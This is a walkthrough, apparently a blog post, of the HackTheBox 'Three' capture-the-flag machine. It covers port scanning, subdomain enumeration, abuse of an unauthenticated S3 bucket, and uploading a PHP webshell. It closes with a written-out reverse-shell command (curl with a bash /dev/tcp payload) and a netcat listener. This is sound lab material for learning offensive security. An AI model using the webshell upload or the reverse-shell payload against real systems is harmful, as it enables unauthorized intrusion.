Pwning the "Three" machine.
Even though this machine sits at the very easy difficulty, I found it to be great for introducing concepts such as domain enumeration, reverse shell, arbitrary file upload and others.
When you spawn the machine, a warning is given:
To guarantee the machine and all its services are ready, you should receive this message when connecting to the s3.thetoppers.htb address. Trying that is fruitless at first, since you should add this entrance to your local /etc/hosts file and make your OS able to resolve the address to the correct IP address. It should look like this:
Next step was running nmap -sV -vvv -Pn -p- -T5 10.129.216.192 to see which doors are open. I scanned all ports with the -T5 option just to make sure none were left behind. The result for the scan shows ports 80 and 22 open.
Reading the webpage available on port 80 gives you the answer to the first 3 tasks. The fourth one asks about a subdomain to be obtained using enumeration, which you can find by using a tool like gobuster. (The subdomain is actually mentioned in the machine description, but let's pretend it wasn't just to show what you'd do without it and learn about subdomain enumeration).
In the image you can see the parameter -w, for wordlist, receives the file names as input. This file actually contains a wordlist I took from here.
You can tell by its name that the subdomain refers to an S3 bucket. If you aren't at all familiar with AWS services, it would be good to check its documentation to understand in detail what it does. Essentially, it allows you to store files.
A well configured bucket will be only accessed if you have AWS credentials with proper authorization, but this is not the case. Use the flag --no-sign-request with the AWS CLI and you should be able to list the buckets and then its contents.
At first, I imagined a flag would be found inside the bucket, but after looking at the files in there, no flag was found. The files in the bucket are nothing but the ones being served on the website, meaning these files actually have access to the server itself. How about using a webshell to get access as well?
Looking at the files in the bucket, you see index.php, meaning PHP is the language used in this server and therefore the language our webshell has to be written in
Don't be fooled if you think a webshell is hard to implement. With a little bit of research you can find many examples, like the one above. Just make sure you read the code and what it does. In this case, the code will take the value of cmd in the $_REQUEST variable and execute it at system level. In PHP, this variable holds the data received from an HTTP request. Upload your webshell to the bucket as shown below:
You can now pass regular shell commands to this page as parameters:
You can get the root flag just by exploring the filesystem via the webshell, but let's go one step further and turn this webshell into a fully dynamic reverse shell. For that, first note the IP address your personal machine has inside the HackTheBox VPN. Then, with the command nc -lnvp 80 open the port 80 (or any other, 80 was my choice) in your personal computer. You now tell the "Three" machine to connect to this open port and direct shell output to and input from it with the command curl http://thetoppers.htb/cmd.php --data-urlencode "cmd=bash -c 'bash -i >& /dev/tcp/<your-machine-ip>/80 0>&1'".
You now have a shell running inside the server, and finding the flag is as easy as checking the flag.txt file in the parent directory.
Top comments (0)